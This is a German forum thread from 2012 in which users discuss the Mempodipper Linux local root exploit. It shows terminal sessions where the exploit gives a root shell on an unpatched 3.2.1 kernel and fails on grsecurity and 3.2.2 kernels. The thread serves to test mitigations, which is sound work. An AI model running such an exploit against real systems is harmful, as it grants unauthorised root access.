Threaded Mode | Linear Mode

tomhb · 01-25-2012 10:06 AM

Moin,

Vielleicht interessiert es ja den ein oder andren:

http://www.heise.de/newsticker/meldung/L...19608.html

Wenn man seinen Kernel mit grsecurity (http://grsecurity.net/) gepatched hat,
passiert da nix, siehe:

Code:

tom@myhost:/data$ uname- a

Linux myhost 3.2.1-grsec #4 SMP Wed Jan 25 00:40:22 CET 2012 x86_64 GNU/Linux

tom@myhost:/data$ id

uid=1000(tom) gid=1000(tom) Gruppen=1000(tom),...,1008(grsec),

tom@myhost:/data$ ./mempodipper

===============================

=          Mempodipper        =

=           by zx2c4          =

=         Jan 21, 2012        =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3620/mem in child.

[-] open: Permission denied

^C

Ohne grsec hat man auf einem Debian GNU/Linux innerhalb einiger
Sekunden eine rootshell.

gruss tom

**tomdooley** · 01-27-2012 05:50 AM

(01-25-2012 10:06 AM)tomhb Wrote: Ohne grsec hat man auf einem Debian GNU/Linux innerhalb einiger
Sekunden eine rootshell.

Also soweit ich weiß, gibts auf der "stable" Debian Squeeze derzeit die Version 2.6.32. Lt. Angaben betrifft den Exploit nur die Kernel ab 2.6.39.

tomhb · 01-27-2012 11:21 AM

(01-27-2012 05:50 AM)tomdooley Wrote:
(01-25-2012 10:06 AM)tomhb Wrote: Ohne grsec hat man auf einem Debian GNU/Linux innerhalb einiger
Sekunden eine rootshell.

Also soweit ich weiß, gibts auf der "stable" Debian Squeeze derzeit die Version 2.6.32. Lt. Angaben betrifft den Exploit nur die Kernel ab 2.6.39.

Natuerlich muessen die Voraussetzungen gegeben sein. Wie es bei einem stable,
testing oder sid unter Debian GNU/Linux "out of the box" aussieht, weiss ich oft
nicht so genau, weil wir die Kernel eben selber (meist mit grsecurity oder tomoyo)
machen.

Beispiel unter 3.2.1

Code:

tom@myhost:/daten$ uname -a

Linux myhost 3.2.1 #2 SMP Thu Jan 19 03:31:38 CET 2012 x86_64 GNU/Linux

tom@myhost:/daten$ id

uid=1000(tom) gid=1000(tom) Gruppen=1000(tom),...

tom@myhost:/daten$ ./mempodipper 

===============================

=          Mempodipper        =

=           by zx2c4          =

=         Jan 21, 2012        =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/10357/mem in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x401fa8.

[+] Calculating su padding.

[+] Seeking to offset 0x401f99.

[+] Executing su with shellcode.

sh-4.2# id

uid=0(root) gid=0(root) groups=0(root),...

Und nun mit 3.2.2

Code:

tom@myhost:/daten$ uname -a

Linux myhost 3.2.2 #1 SMP Fri Jan 27 02:03:33 CET 2012 x86_64 GNU/Linux

tom@myhost:/daten$ id

uid=1000(tom) gid=1000(tom) Gruppen=1000(tom),...

tom@myhost:/daten$ ./mempodipper 

===============================

=          Mempodipper        =

=           by zx2c4          =

=         Jan 21, 2012        =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/6179/mem in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x401fa8.

[+] Calculating su padding.

[+] Seeking to offset 0x401f99.

[+] Executing su with shellcode.

tom@myhost:/daten$

Geht also mit dem 3.2.2 von gestern nicht mehr.

gruss tom

Threaded Mode \| Linear Mode blöder root-exploit...
Author	Message